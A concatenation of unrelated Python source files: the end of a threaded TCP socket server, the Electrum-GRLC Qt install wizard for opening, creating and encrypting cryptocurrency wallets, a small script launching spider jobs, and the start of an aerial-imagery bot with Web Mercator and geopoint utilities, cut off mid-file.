def send(self, message):
self.client_sock.send(message.encode())
def read_loop(self):
while True:
message = self.client_sock.recv(1024)
if len(message) == 0:
break
self.server.event.trigger_event("on_message", self, message)
self.server.connection_closed(self)
def handle_connection(self):
Thread(target=ClientConnection.read_loop, args=(self, )).start()
class DanServer(BaseConnection):
def __init__(self, host, port, protocol="TCP", max_connections=50):
self._sock = socket.socket(socket.AF_INET, BaseConnection.PROTOCOL[protocol])
self._sock.bind((host, port))
self._clients = {}
self.max_connections = max_connections
self.event = Event  # note: Event is used here as a class, not an instance
def connection_closed(self, client):
client.client_sock.close()
if client in self._clients:
del self._clients[client]
self.event.trigger_event("on_connection_closed", client)
def start(self):
self._sock.listen(self.max_connections)
while True:
client_sock, address = self._sock.accept()
client = ClientConnection(client_sock, self)
self._clients[client] = address
self.event.trigger_event("on_new_connection", client)
|
installwizard.py
|
# Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import json
import sys
import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional, TYPE_CHECKING
from functools import partial
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea, QApplication)
from electrum_grlc.wallet import Wallet, Abstract_Wallet
from electrum_grlc.storage import WalletStorage, StorageReadWriteError
from electrum_grlc.util import UserCancelled, InvalidPassword, WalletFileException, get_new_wallet_name
from electrum_grlc.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack, ReRunDialog
from electrum_grlc.network import Network
from electrum_grlc.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton, char_width_in_lineedit, PasswordLineEdit)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
from .bip39_recovery_dialog import Bip39RecoveryDialog
from electrum_grlc.plugin import run_hook, Plugins
if TYPE_CHECKING:
from electrum_grlc.simple_config import SimpleConfig
from electrum_grlc.wallet_db import WalletDB
from . import ElectrumGui
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:T4PsyoR5gC8B... \t-> LXqi2tzER...\n' +
'p2wpkh-p2sh:T4PsyoR5gC8B... \t-> MUuWxSpVC...\n' +
'p2wpkh:T4PsyoR5gC8B... \t-> ltc1q3fjf...')
# note: full key is T4PsyoR5gC8BGEoTe8So7YQWPnvdkqTJqRVpLoMmZVqBsunDdeuJ
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
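# QPainter.drawPie() takes its start angle and span in 1/16ths of a degree,
# hence the factor of 16 in the alpha values below.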
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0] # type: InstallWizard
while True:
#wizard.logger.debug(f"dialog stack. len: {len(wizard._stack)}. stack: {wizard._stack}")
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
# current dialog
try:
out = func(*args, **kwargs)
if type(out) is not tuple:
out = (out,)
except GoBack:
if not wizard.can_go_back():
wizard.close()
raise UserCancelled
else:
# to go back from the current dialog, we just let the caller unroll the stack:
raise
# next dialog
try:
while True:
try:
run_next(*out)
except ReRunDialog:
# restore state, and then let the loop re-run next
wizard.go_back(rerun_previous=False)
else:
break
except GoBack as e:
# to go back from the next dialog, we ask the wizard to restore state
wizard.go_back(rerun_previous=False)
# and we re-run the current dialog
if wizard.can_go_back():
# also rerun any calculations that might have populated the inputs to the current dialog,
# by going back to just after the *previous* dialog finished
raise ReRunDialog() from e
else:
continue
else:
break
return func_wrapper
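# In short: a method decorated with @wizard_dialog renders a single wizard page
# and returns its result, which the wrapper feeds to run_next; GoBack raised by
# the current page either cancels (when there is no history) or unrolls the
# caller's stack, while GoBack/ReRunDialog raised while running the next page
# makes the wizard restore its state and re-run the current page (or propagate
# another ReRunDialog further back when possible).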
class WalletAlreadyOpenInMemory(Exception):
def __init__(self, wallet: Abstract_Wallet):
super().__init__()
self.wallet = wallet
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config: 'SimpleConfig', app: QApplication, plugins: 'Plugins', *, gui_object: 'ElectrumGui'):
QDialog.__init__(self, None)
BaseWizard.__init__(self, config, plugins)
self.setWindowTitle('Electrum-GRLC - ' + _('Install Wizard'))
self.app = app
self.config = config
self.gui_thread = gui_object.gui_thread
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setFocusPolicy(Qt.NoFocus)
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon('electrum-grlc.png')
self.show()
self.raise_()
self.refresh_gui()  # Needed for QT on MacOSX. Lame.
def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
name_e = QLineEdit()
hbox.addWidget(name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
msg_label = WWLabel('')
vbox.addWidget(msg_label)
hbox2 = QHBoxLayout()
pw_e = PasswordLineEdit('', self)
pw_e.setFixedWidth(17 * char_width_in_lineedit())
pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(pw_label)
hbox2.addWidget(pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
vbox.addSpacing(50)
vbox_create_new = QVBoxLayout()
vbox_create_new.addWidget(QLabel(_('Alternatively') + ':'), alignment=Qt.AlignLeft)
button_create_new = QPushButton(_('Create New Wallet'))
button_create_new.setMinimumWidth(120)
vbox_create_new.addWidget(button_create_new, alignment=Qt.AlignLeft)
widget_create_new = QWidget()
widget_create_new.setLayout(vbox_create_new)
vbox_create_new.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(widget_create_new)
self.set_layout(vbox, title=_('Electrum-GRLC wallet'))
temp_storage = None # type: Optional[WalletStorage]
wallet_folder = os.path.dirname(path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
name_e.setText(path)
def on_filename(filename):
# FIXME? "filename" might contain ".." (etc) and hence sketchy path traversals are possible
nonlocal temp_storage
temp_storage = None
msg = None
if filename:
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
temp_storage = wallet_from_memory.storage # type: Optional[WalletStorage]
else:
temp_storage = WalletStorage(path)
except (StorageReadWriteError, WalletFileException) as e:
msg = _('Cannot read file') + f'\n{repr(e)}'
except Exception as e:
self.logger.exception('')
msg = _('Cannot read file') + f'\n{repr(e)}'
else:
msg = ""
self.next_button.setEnabled(temp_storage is not None)
user_needs_to_enter_password = False
if temp_storage:
if not temp_storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
elif not wallet_from_memory:
if temp_storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
user_needs_to_enter_password = True
elif temp_storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
else:
msg = _("Press 'Next' to open this wallet.")
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
if msg is None:
msg = _('Cannot read file')
msg_label.setText(msg)
widget_create_new.setVisible(bool(temp_storage and temp_storage.file_exists()))
if user_needs_to_enter_password:
pw_label.show()
pw_e.show()
pw_e.setFocus()
else:
pw_label.hide()
pw_e.hide()
button.clicked.connect(on_choose)
button_create_new.clicked.connect(
partial(
name_e.setText,
get_new_wallet_name(wallet_folder)))
name_e.textChanged.connect(on_filename)
name_e.setText(os.path.basename(path))
def run_user_interaction_loop():
while True:
if self.loop.exec_() != 2: # 2 = next
raise UserCancelled()
assert temp_storage
if temp_storage.file_exists() and not temp_storage.is_encrypted():
break
if not temp_storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(temp_storage.path)
if wallet_from_memory:
raise WalletAlreadyOpenInMemory(wallet_from_memory)
if temp_storage.file_exists() and temp_storage.is_encrypted():
if temp_storage.is_encrypted_with_user_pw():
password = pw_e.text()
try:
temp_storage.decrypt(password)
break
except InvalidPassword as e:
self.show_message(title=_('Error'), msg=str(e))
continue
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
elif temp_storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=temp_storage)
except InvalidPassword as e:
self.show_message(title=_('Error'),
msg=_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.reset_stack()
return self.select_storage(path, get_wallet_from_daemon)
except (UserCancelled, GoBack):
raise
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
if temp_storage.is_past_initial_decryption():
break
else:
raise UserCancelled()
else:
raise Exception('Unexpected encryption version')
try:
run_user_interaction_loop()
finally:
try:
pw_e.clear()
except RuntimeError: # wrapped C/C++ object has been deleted.
pass # happens when decrypting with hw device
return temp_storage.path, (temp_storage if temp_storage.file_exists() else None)
def run_upgrades(self, storage: WalletStorage, db: 'WalletDB') -> None:
path = storage.path
if db.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = db.split_accounts(path)
msg = _('Your accounts have been moved to') + ':\n' + '\n'.join(file_list) + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
# raise now, to avoid having the old storage opened
raise UserCancelled()
action = db.get_action()
if action and db.requires_upgrade():
raise WalletFileException('Incomplete wallet files cannot be upgraded.')
if action:
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
self.data = json.loads(storage.read())
self.run(action)
for k, v in self.data.items():
db.put(k, v)
db.write(storage)
return
if db.requires_upgrade():
self.upgrade_db(storage, db)
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
self.logger.error("on_error", exc_info=exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(icon_path(filename))
.scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True, focused_widget=None):
self.set_layout(layout, title, next_enabled)
if focused_widget:
focused_widget.setFocus()
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled()
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi, config=self.config)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(
title=message,
is_seed=is_seed,
options=options,
parent=self,
config=self.config,
)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.seed_type, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
if self.opt_slip39:
options.append('slip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, seed, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, seed_type, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(
seed=seed_text,
title=title,
msg=True,
options=['ext'],
config=self.config,
)
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
pw_layout = PasswordLayout(
msg=msg, kind=kind, OK_button=self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
pw_layout.encrypt_cb.setChecked(True)
try:
self.exec_layout(pw_layout.layout(), focused_widget=pw_layout.new_pw)
return pw_layout.new_password(), pw_layout.encrypt_cb.isChecked()
finally:
pw_layout.clear_password_fields()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self, **kwargs):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
def run_task_without_blocking_gui(self, task, *, msg=None):
assert self.gui_thread == threading.current_thread(), 'must be called from GUI thread'
if msg is None:
msg = _("Please wait...")
exc = None # type: Optional[Exception]
res = None
def task_wrapper():
nonlocal exc
nonlocal res
try:
res = task()
except Exception as e:
exc = e
self.waiting_dialog(task_wrapper, msg=msg)
if exc is None:
return res
else:
raise exc
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def derivation_and_script_type_gui_specific_dialog(
self,
*,
title: str,
message1: str,
choices: List[Tuple[str, str, str]],
hide_choices: bool = False,
message2: str,
test_text: Callable[[str], int],
run_next,
default_choice_idx: int = 0,
get_account_xpub=None,
) -> Tuple[str, str]:
vbox = QVBoxLayout()
if get_account_xpub:
button = QPushButton(_("Detect Existing Accounts"))
def on_account_select(account):
script_type = account["script_type"]
if script_type == "p2pkh":
script_type = "standard"
button_index = c_values.index(script_type)
button = clayout.group.buttons()[button_index]
button.setChecked(True)
line.setText(account["derivation_path"])
button.clicked.connect(lambda: Bip39RecoveryDialog(self, get_account_xpub, on_account_select))
vbox.addWidget(button, alignment=Qt.AlignLeft)
vbox.addWidget(QLabel(_("Or")))
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click,
checked_index=default_choice_idx)
if not hide_choices:
vbox.addLayout(clayout.layout())
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(
xpub,
title=msg,
icon=False,
for_seed_words=False,
config=self.config,
)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network: 'Network'):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
self.config.set_key('auto_connect', network.auto_connect, True)
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
n_edit = QSlider(Qt.Horizontal, self)
m_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
backup_warning_label.setVisible(cw.m != cw.n)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
backup_warning_label.setVisible(cw.m != cw.n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
vbox.addSpacing(2 * char_width_in_lineedit())
backup_warning_label = WWLabel(_("Warning: to be able to restore a multisig wallet, "
"you should include the master public key for each cosigner "
"in all of your backups."))
vbox.addWidget(backup_warning_label)
on_n(2)
on_m(2)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
start.py
|
import os
import threading
threading.Thread(target=os.system("python spider_main2.py"))
threading.Thread(target=os.system("python spider_main3.py"))
threading.Thread(target=os.system("python spider_main4.py"))
threading.Thread(target=os.system("python spider_main5.py"))
threading.Thread(target=os.system("python spider_main6.py"))
|
aerialbot.py
|
import io
import math
import os
import re
import random
import sys
import time
from datetime import datetime
import argparse
import logging
import logging.config
import traceback
import concurrent.futures
import threading
import requests
from configobj import ConfigObj
import shapefile
import shapely.geometry
from PIL import Image, ImageEnhance, ImageOps
Image.MAX_IMAGE_PIXELS = None
import tweepy
TILE_SIZE = 256 # in pixels
EARTH_CIRCUMFERENCE = 40075.016686 * 1000 # in meters, at the equator
USER_AGENT = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36"
LOGGER = None
VERBOSITY = None
class WebMercator:
"""Various functions related to the Web Mercator projection."""
@staticmethod
def project(geopoint, zoom):
"""
An implementation of the Web Mercator projection (see
https://en.wikipedia.org/wiki/Web_Mercator_projection#Formulas) that
returns floats. That's required for cropping of stitched-together tiles
such that they only show the configured area, hence no use of math.floor
here.
"""
factor = (1 / (2 * math.pi)) * 2 ** zoom
x = factor * (math.radians(geopoint.lon) + math.pi)
y = factor * (math.pi - math.log(math.tan((math.pi / 4) + (math.radians(geopoint.lat) / 2))))
return (x, y)
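# Worked example (illustration only): at zoom 0 the projection maps the whole
# world onto the unit square, so lat=0, lon=0 lands at its center:
#   factor = (1 / (2 * math.pi)) * 2 ** 0
#   x = factor * (math.radians(0) + math.pi)                        # == 0.5
#   y = factor * (math.pi - math.log(math.tan(math.pi / 4 + 0.0)))  # == 0.5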
class GeoPoint:
"""
A latitude-longitude coordinate pair, in that order due to ISO 6709, see:
https://stackoverflow.com/questions/7309121/preferred-order-of-writing-latitude-longitude-tuples
"""
def __init__(self, lat, lon):
assert -90 <= lat <= 90 and -180 <= lon <= 180
self.lat = lat
self.lon = lon
def __repr__(self):
return f"GeoPoint({self.lat}, {self.lon})"
def fancy(self):
"""Stringifies the point in a more fancy way than __repr__, e.g.
"44°35'27.6"N 100°21'53.1"W", i.e. with minutes and seconds."""
# helper function as both latitude and longitude are stringified
# basically the same way
def fancy_coord(coord, pos, neg):
coord_dir = pos if coord > 0 else neg
coord_tmp = abs(coord)
coord_deg = math.floor(coord_tmp)
coord_tmp = (coord_tmp - math.floor(coord_tmp)) * 60
coord_min = math.floor(coord_tmp)
coord_sec = round((coord_tmp - math.floor(coord_tmp)) * 600) / 10
coord = f"{coord_deg}°{coord_min}'{coord_sec}\"{coord_dir}"
return coord
lat = fancy_coord(self.lat, "N", "S")
lon = fancy_coord(self.lon, "E", "W")
return f"{lat} {lon}"
@classmethod
def random(cls, georect):
"""
Generating a random point with regard to actual surface area is a bit
tricky due to meridians being closer together at high latitudes (see
https://en.wikipedia.org/wiki/Mercator_projection#Distortion_of_sizes),
which is why this isn't just a matter of doing something like this:
lat = random.uniform(georect.sw.lat, georect.ne.lat)
lon = random.uniform(georect.sw.lon, georect.ne.lon)
"""
# latitude
north = math.radians(georect.ne.lat)
south = math.radians(georect.sw.lat)
lat = math.degrees(math.asin(random.random() * (math.sin(north) - math.sin(south)) + math.sin(south)))
# longitude
west = georect.sw.lon
east = georect.ne.lon
width = east - west
if width < 0:
width += 360
lon = west + width * random.random()
if lon > 180:
lon -= 360
elif lon < -180:
lon += 360
# for debugging:
"""
for i in range(1000):
p = GeoPoint.random(GeoRect(GeoPoint(0,0),GeoPoint(90,10)))
print(f"{p.lon} {p.lat}")
sys.exit()
# run as: python3 aerialbot.py | gnuplot -p -e "plot '<cat'"
"""
return cls(lat, lon)
def to_maptile(self, zoom):
"""
Conversion of this geopoint to a tile through application of the Web
Mercator projection and flooring to get integer tile coordinates.
"""
x, y = WebMercator.project(self, zoom)
return MapTile(zoom, math.floor(x), math.floor(y))
def to_shapely_point(self):
"""
Conversion to a point as expected by shapely. Note that latitude and
longitude are reversed here – this matches their order in shapefiles.
"""
return shapely.geometry.Point(self.lon, self.lat)
def compute_zoom_level(self, max_meters_per_pixel):
"""
Computes the outermost (i.e. lowest) zoom level that still fulfills the
constraint. See:
https://wiki.openstreetmap.org/wiki/Slippy_map_tilenames#Resolution_and_Scale
"""
meters_per_pixel_at_zoom_0 = ((EARTH_CIRCUMFERENCE / TILE_SIZE) * math.cos(math.radians(self.lat)))
# 23 seems to be the highest zoom level supported anywhere in the world, see
# https://stackoverflow.com/a/32407072 (although 19 or 20 is the highest
# in many places in practice)
for zoom in reversed(range(0, 23+1)):
meters_per_pixel = meters_per_pixel_at_zoom_0 / (2 ** zoom)
# once meters_per_pixel eclipses the maximum, we know that the
# previous zoom level was correct
if meters_per_pixel > max_meters_per_pixel:
return zoom + 1
else:
# if no match, the required zoom level would have been too high
raise RuntimeError("your settings seem to require a zoom level higher than is commonly available")
class GeoRect:
"""
A rectangle between two points. The first point must be the southwestern
corner, the second point the northeastern corner:
+---+ ne
| |
sw +---+
"""
def __init__(self, sw, ne):
assert sw.lat <= ne.lat
# not assert sw.lon < ne.lon since it may stretch across the date line
self.sw = sw
self.ne = ne
def __repr__(self):
return f"GeoRect({self.sw}, {self.ne})"
@classmethod
def from_shapefile_bbox(cls, bbox):
"""
Basically from [sw_lon, sw_lat, ne_lon, ne_lat], which is the order
pyshp stores bounding boxes in.
"""
sw = GeoPoint(bbox[1], bbox[0])
ne = GeoPoint(bbox[3], bbox[2])
return cls(sw, ne)
@classmethod
def around_geopoint(cls, geopoint, width, height):
"""
Creates a rectangle with the given point at its center. Like the random
point generator, this accounts for high-latitude longitudes being closer
together than at the equator. See also:
